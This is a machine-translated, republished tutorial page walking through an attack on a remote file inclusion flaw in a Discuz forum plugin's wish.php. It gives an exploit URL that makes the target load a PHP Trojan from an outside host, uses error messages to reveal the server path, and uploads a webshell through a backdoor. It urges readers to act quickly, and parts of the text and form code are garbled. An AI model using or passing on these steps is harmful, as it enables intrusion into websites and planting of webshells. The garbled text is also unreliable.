search

Home >Backend Development >PHP Tutorial >Discuz plug-in vulnerability attack_PHP tutorial

Discuz plug-in vulnerability attack_PHP tutorial

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOriginal
2016-07-13 17:08:511128browse

PS: This vulnerability has been mentioned many times in “Hacker !The source of the news was told to me by Gui Zai. It seems that some brother of Firefox discovered the hole. I’m not sure!
The wishing pool plug-in of the discuz forum has a wish.php file in the DZ root directory. The fourth line of the file:
require $discuz_root.'./include/discuzcode.func.php';
Obviously the program does not do any filtering. It is a complete remote inclusion vulnerability. The specific exploitation method is very simple:
http:/ /www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?
Don’t forget there is a question mark after it! xxxx.txt is my PHP Trojan, c99shell doesn’t know Why, I didn't succeed. Maybe it has something to do with the operating system. I didn't experiment carefully. I directly used the PHP backdoor of Security Angel, but I could get a "webshell", but I couldn't upload our real webshell using the PHP backdoor of Security Angel. Go up, so you can upload your WEBSHELL to the website directory using the following file,



< ;input VALUE=" Submit" TYPE="submit">

How to get the actual path of the website? It's very simple, just open http://www.163.com/wish.php ?discuz_root=http://www.flyt.cn/xxxx.txt, don’t leave out the question mark at the end, then you will find that the program reports an error, and the actual path of the website will be revealed! Modify
C in the file: Inetpubvhosts aidu.com bs
is the actual path of the website you want to hack; cntink.php is the name you need to save after uploading the webshell, whatever you choose!
Save the above file as txt ( Other extensions can also be uploaded to your own website. For example, I named it fly.txt, and now open
http://www.163.com/wish.php?discuz_root=http://www. flyt.cn/fly.txt?
OK...See the upload dialog box? Upload your webshell slowly! The uploaded path is the path you set in fly.txt!
Above The article is purely random writing. If anyone uses this method to hack the site and gets in trouble, don't come to me... In fact, this thing should be made public after a patch is released, but it is not an official plug-in, and others have already posted it, so it doesn't matter. !
PS: You need to act quickly. Quote from a certain


http://www.bkjia.com/PHPjc/629813.html

www.bkjia.com

truehttp: //www.bkjia.com/PHPjc/629813.htmlTechArticlePS: Speaking of this vulnerability, "Hacker X-Files" has mentioned it N times, haha... .. Since someone has announced it, and someone has even written the exploit program, I will announce it! The source of the news is Guizai...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:PHP random password generation_PHP tutorialNext article:PHP random password generation_PHP tutorial

Related articles

See more